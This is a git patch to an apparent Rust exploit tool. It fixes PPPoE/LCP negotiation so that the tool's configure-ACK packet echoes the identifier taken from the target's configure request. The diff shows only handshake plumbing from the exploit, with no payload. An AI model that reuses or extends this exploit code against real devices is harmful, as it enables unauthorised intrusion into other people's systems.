From 2fdde5e443d4924492a84739bdbafb4959fb79ea Mon Sep 17 00:00:00 2001 From: fedebuonco Date: Sat, 12 Oct 2024 13:22:37 +0100 Subject: [PATCH] Repair LCP nego --- src/exploit.rs | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/src/exploit.rs b/src/exploit.rs index 2f040c0..1f1cc2c 100644 --- a/src/exploit.rs +++ b/src/exploit.rs @@ -65,7 +65,6 @@ impl<'a> LcpEchoHandler<'a> { pub fn stop(&mut self) { // Stop the thread self.running.store(false, Ordering::Relaxed); - // Join the thread if it is running if let Some(handle) = self.thread_handle.take() { handle.join().unwrap(); } @@ -200,13 +199,15 @@ impl Exploit { println!("[*] Waiting for LCP configure ACK..."); let _result = listen_for_packet(rx.as_mut(), is_lcp_conf_ack); println!("[*] Waiting for LCP configure request..."); - let _result = listen_for_packet(rx.as_mut(), is_lcp_conf_req); - println!("[*] Sending LCP configure ACK..."); + let result = listen_for_packet(rx.as_mut(), is_lcp_conf_req); + println!("[*] Sending LCP configure ACK..."); // FIX this need to have id of the request + let id = u8::from_be_bytes([result.unwrap()[23]]); let lcp_conf_ack = create_lcp_conf_ack( self.source_mac, self.target_mac, 0x00, constants::PPPOE_SESSION_ID.to_be_bytes(), + id, ); let _result = tx .send_to(&lcp_conf_ack, None) @@ -852,6 +853,7 @@ pub fn create_lcp_conf_ack( target_mac: [u8; 6], session_data: u8, session_id: [u8; 2], + identifier: u8, ) -> Vec { let mut payload = Vec::new(); // PPPoE header @@ -867,7 +869,7 @@ pub fn create_lcp_conf_ack( // LCP and fixed length payload.push(constants::LCP_CONF_ACK); // Configuration Ack - payload.push(constants::LCP_ID); + payload.push(identifier); payload.extend_from_slice(&[0, 4]); ether::Builder::default()